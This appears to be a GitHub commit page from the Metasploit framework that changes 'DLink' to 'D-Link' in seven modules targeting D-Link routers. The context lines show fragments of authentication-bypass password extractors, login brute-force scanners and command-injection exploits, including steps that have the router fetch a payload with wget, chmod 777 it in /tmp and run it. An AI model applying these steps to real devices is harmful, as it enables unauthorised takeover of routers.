Skip to content

Commit adef046

Browse files
committed
Land rapid7#2149, another good @todb-r7 English thing
2 parents bb16683 + 147d432 commit adef046

File tree

7 files changed

+27
-27
lines changed

7 files changed

+27
-27
lines changed

modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
1414

1515
def initialize
1616
super(
17-
'Name' => 'DLink DIR 645 Password Extractor',
17+
'Name' => 'D-Link DIR 645 Password Extractor',
1818
'Description' => %q{
1919
This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.
2020
With this vulnerability you are able to extract the password for the remote

modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary
1414

1515
def initialize
1616
super(
17-
'Name' => 'DLink DSL 320B Password Extractor',
17+
'Name' => 'D-Link DSL 320B Password Extractor',
1818
'Description' => %q{
19-
This module exploits an authentication bypass vulnerability in DLink DSL 320B
19+
This module exploits an authentication bypass vulnerability in D-Link DSL 320B
2020
<=v1.23. This vulnerability allows to extract the credentials for the remote
2121
management interface.
2222
},

modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
1818

1919
def initialize
2020
super(
21-
'Name' => 'DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility',
21+
'Name' => 'D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility',
2222
'Description' => %q{
23-
This module attempts to authenticate to different DLink HTTP management
23+
This module attempts to authenticate to different D-Link HTTP management
2424
services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615
2525
Hardware revision D and D-Link DIR-320 devices. It is possible that this module
2626
also works with other models.
@@ -71,9 +71,9 @@ def run_host(ip)
7171
@uri = "/login.php"
7272

7373
if is_dlink?
74-
vprint_good("#{target_url} - DLink device detected")
74+
vprint_good("#{target_url} - D-Link device detected")
7575
else
76-
vprint_error("#{target_url} - Dlink device doesn't detected")
76+
vprint_error("#{target_url} - D-Link device doesn't detected")
7777
return
7878
end
7979

@@ -100,7 +100,7 @@ def do_login(user='admin', pass='')
100100
:sname => (ssl ? 'https' : 'http'),
101101
:user => user,
102102
:pass => pass,
103-
:proof => "WEBAPP=\"DLink Management Interface\", PROOF=#{response.to_s}",
103+
:proof => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
104104
:active => true
105105
)
106106

modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
1818

1919
def initialize
2020
super(
21-
'Name' => 'DLink DIR-615H HTTP Login Utility',
21+
'Name' => 'D-Link DIR-615H HTTP Login Utility',
2222
'Description' => %q{
23-
This module attempts to authenticate to different DLink HTTP management
23+
This module attempts to authenticate to different D-Link HTTP management
2424
services. It has been tested successfully on D-Link DIR-615 Hardware revision H
2525
devices. It is possible that this module also works with other models.
2626
},
@@ -56,9 +56,9 @@ def run_host(ip)
5656
@uri = "/login.htm"
5757

5858
if is_dlink?
59-
vprint_good("#{target_url} - DLink device detected")
59+
vprint_good("#{target_url} - D-Link device detected")
6060
else
61-
vprint_error("#{target_url} - Dlink device doesn't detected")
61+
vprint_error("#{target_url} - D-Link device doesn't detected")
6262
return
6363
end
6464

@@ -109,7 +109,7 @@ def do_login(user='admin', pass='')
109109
:sname => (ssl ? 'https' : 'http'),
110110
:user => user,
111111
:pass => pass,
112-
:proof => "WEBAPP=\"Dlink Management Interface\", PROOF=#{response.to_s}",
112+
:proof => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
113113
:active => true
114114
)
115115

modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Auxiliary
1818

1919
def initialize
2020
super(
21-
'Name' => 'DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',
21+
'Name' => 'D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',
2222
'Description' => %q{
23-
This module attempts to authenticate to different DLink HTTP management
23+
This module attempts to authenticate to different D-Link HTTP management
2424
services. It has been tested successfully on D-Link DIR-300 Hardware revision B,
2525
D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645
2626
Hardware revision A devices.It is possible that this module also works with other
@@ -72,9 +72,9 @@ def run_host(ip)
7272
@uri = "/session.cgi"
7373

7474
if is_dlink?
75-
vprint_good("#{target_url} - DLink device detected")
75+
vprint_good("#{target_url} - D-Link device detected")
7676
else
77-
vprint_error("#{target_url} - Dlink device doesn't detected")
77+
vprint_error("#{target_url} - D-Link device doesn't detected")
7878
return
7979
end
8080

@@ -101,7 +101,7 @@ def do_login(user='admin', pass='')
101101
:sname => (ssl ? 'https' : 'http'),
102102
:user => user,
103103
:pass => pass,
104-
:proof => "WEBAPP=\"Dlink Management Interface\", PROOF=#{response.to_s}",
104+
:proof => "WEBAPP=\"D-Link Management Interface\", PROOF=#{response.to_s}",
105105
:active => true
106106
)
107107

modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -17,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote
1717

1818
def initialize(info = {})
1919
super(update_info(info,
20-
'Name' => 'DLink DIR-645 / DIR-815 diagnostic.php Command Execution',
20+
'Name' => 'D-Link DIR-645 / DIR-815 diagnostic.php Command Execution',
2121
'Description' => %q{
22-
Some DLink Routers are vulnerable to OS Command injection in the web interface.
22+
Some D-Link Routers are vulnerable to OS Command injection in the web interface.
2323
On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On
2424
version 1.03 authentication is needed in order to trigger the vulnerability, which
25-
has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B
25+
has been fixed definitely on version 1.04. Other D-Link products, like DIR-300 rev B
2626
and DIR-600, are also affected by this vulnerability. Not every device includes
2727
wget which we need for deploying our payload. On such devices you could use the cmd
2828
generic payload and try to start telnetd or execute other commands. Since it is a
@@ -155,7 +155,7 @@ def exploit
155155
#
156156
# download payload
157157
#
158-
print_status("#{rhost}:#{rport} - Asking the DLink device to download #{service_url}")
158+
print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
159159
#this filename is used to store the payload on the device
160160
filename = rand_text_alpha_lower(8)
161161

@@ -168,7 +168,7 @@ def exploit
168168

169169
# wait for payload download
170170
if (datastore['DOWNHOST'])
171-
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
171+
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
172172
select(nil, nil, nil, datastore['HTTP_DELAY'])
173173
else
174174
wait_linux_payload
@@ -179,7 +179,7 @@ def exploit
179179
# chmod
180180
#
181181
cmd = "chmod 777 /tmp/#{filename}"
182-
print_status("#{rhost}:#{rport} - Asking the DLink device to chmod #{downfile}")
182+
print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
183183
res = request(cmd,uri)
184184
if (!res)
185185
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
@@ -189,7 +189,7 @@ def exploit
189189
# execute
190190
#
191191
cmd = "/tmp/#{filename}"
192-
print_status("#{rhost}:#{rport} - Asking the DLink device to execute #{downfile}")
192+
print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
193193
res = request(cmd,uri)
194194
if (!res)
195195
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")

modules/exploits/linux/http/dlink_upnp_exec_noauth.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -212,7 +212,7 @@ def exploit_mips
212212
#
213213
# download payload
214214
#
215-
print_status("#{rhost}:#{rport} - Asking the DLink device to take and execute #{service_url}")
215+
print_status("#{rhost}:#{rport} - Asking the D-Link device to take and execute #{service_url}")
216216
#this filename is used to store the payload on the device
217217
filename = rand_text_alpha_lower(8)
218218

@@ -225,7 +225,7 @@ def exploit_mips
225225

226226
# wait for payload download
227227
if (datastore['DOWNHOST'])
228-
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLink device to download the payload")
228+
print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
229229
select(nil, nil, nil, datastore['HTTP_DELAY'])
230230
else
231231
wait_linux_payload

0 commit comments

Comments
 (0)